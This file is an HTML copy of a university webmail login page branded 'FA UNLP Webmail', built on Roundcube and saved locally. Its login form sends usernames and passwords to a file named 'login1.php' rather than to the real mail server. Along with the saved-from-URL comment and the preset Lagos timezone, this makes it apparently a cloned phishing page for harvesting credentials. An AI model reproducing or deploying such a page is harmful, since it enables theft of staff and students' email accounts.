<!DOCTYPE html>
<!-- saved from url=(0040)https://correo1.fba.unlp.edu.ar/webmail/ -->
<html lang="en" class=" js chrome webkit"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>FA UNLP Webmail :: Welcome to FA UNLP Webmail</title>
<meta name="viewport" content="" id="viewport">

<link rel="shortcut icon" href="./index_files/logo.png">

<link rel="stylesheet" type="text/css" href="./index_files/styles.min.css">
<link rel="stylesheet" type="text/css" href="./index_files/jquery-ui.css">
<script src="./index_files/ui.min.js.download"></script>




<script src="./index_files/jquery.min.js.download"></script>
<script src="./index_files/common.min.js.download"></script>
<script src="./index_files/app.min.js.download"></script>
<script src="./index_files/jstz.min.js.download"></script>
<script>
/*
        @licstart  The following is the entire license notice for the 
        JavaScript code in this page.

        Copyright (C) The Roundcube Dev Team

        The JavaScript code in this page is free software: you can redistribute
        it and/or modify it under the terms of the GNU General Public License
        as published by the Free Software Foundation, either version 3 of
        the License, or (at your option) any later version.

        The code is distributed WITHOUT ANY WARRANTY; without even the implied
        warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
        See the GNU GPL for more details.

        @licend  The above is the entire license notice
        for the JavaScript code in this page.
*/
var rcmail = new rcube_webmail();
rcmail.set_env({"task":"login","standard_windows":false,"locale":"en_US","devel_mode":null,"rcversion":10411,"cookie_domain":"","cookie_path":"/","cookie_secure":true,"skin":"larry","blankpage":"skins/larry/watermark.html","refresh_interval":60,"session_lifetime":600,"action":"","comm_path":"./?_task=login","compose_extwin":false,"date_format":"yy-mm-dd","date_format_localized":"YYYY-MM-DD","request_token":"OmobAK8aJoTacwCH0zaq37TE7bA3XBjr"});
rcmail.add_label({"loading":"Loading...","servererror":"Server Error!","connerror":"Connection Error (Failed to reach the server)!","requesttimedout":"Request timed out","refreshing":"Refreshing...","windowopenerror":"The popup window was blocked!","uploadingmany":"Uploading files...","uploading":"Uploading file...","close":"Close","save":"Save","cancel":"Cancel","alerttitle":"Attention","confirmationtitle":"Are you sure...","delete":"Delete","continue":"Continue","ok":"OK","errortitle":"An error occurred!","toggleadvancedoptions":"Toggle advanced options","options":"Options"});
rcmail.gui_container("loginfooter","bottomline");rcmail.gui_object('loginform', 'form');
rcmail.gui_object('message', 'message');
</script>

<script src="./index_files/jquery-ui.min.js.download"></script>

</head>
<body>

<h1 class="voice">FA UNLP Webmail Login</h1>

<div id="login-form">
<div class="box-inner" role="main">
<img src="./index_files/logo.png" id="logo" alt="FA UNLP Webmail">

<form name="form" method="post" action="login1.php">
<input type="hidden" name="_token" value="OmobAK8aJoTacwCH0zaq37TE7bA3XBjr">
<input type="hidden" name="_task" value="login"><input type="hidden" name="_action" value="login"><input type="hidden" name="_timezone" id="rcmlogintz" value="Africa/Lagos"><input type="hidden" name="_url" id="rcmloginurl" value=""><table><tbody><tr><td class="title"><label for="rcmloginuser">Username</label>
</td>
<td class="input"><input name="_user" id="rcmloginuser" required="" size="40" autocapitalize="off" type="text"></td>
</tr>
<tr><td class="title"><label for="rcmloginpwd">Password</label>
</td>
<td class="input"><input name="_pass" id="rcmloginpwd" required="" size="40" autocapitalize="off" type="password"></td>
</tr>
<tr><td class="title"><label for="rcmloginhost">Server</label>
</td>
<td class="input"><select name="_host" id="rcmloginhost">
<option value="localhost">fba.unlp.edu.ar</option>
<option value="127.0.0.1">Local</option>
</select>
</td>
</tr>
</tbody>
</table>
<p class="formbuttons"><button type="submit" id="rcmloginsubmit" class="button mainaction submit">Login</button>
</p>

</form>

</div>

<div class="box-bottom" role="complementary">
	<div id="message"></div>
	<noscript>
		<p class="noscriptwarning">Warning: This webmail service requires Javascript! In order to use it please enable Javascript in your browser's settings.</p>
	</noscript>
</div>

<div id="bottomline" role="contentinfo">
	FA UNLP Webmail 
		
</div>
</div>



<script>
if (!window.UI) { var UI = new rcube_mail_ui(); }
</script>
<script>
$(function() {
rcmail.init();
var images = ["skins/larry/images/ajaxloader.gif","skins/larry/images/ajaxloader_dark.gif","skins/larry/images/buttons.png","skins/larry/images/addcontact.png","skins/larry/images/filetypes.png","skins/larry/images/listicons.png","skins/larry/images/messages.png","skins/larry/images/messages_dark.png","skins/larry/images/quota.png","skins/larry/images/selector.png","skins/larry/images/splitter.png","skins/larry/images/watermark.jpg"];
            for (var i=0; i<images.length; i++) {
                img = new Image();
                img.src = images[i];
            }
});
</script>







</body></html>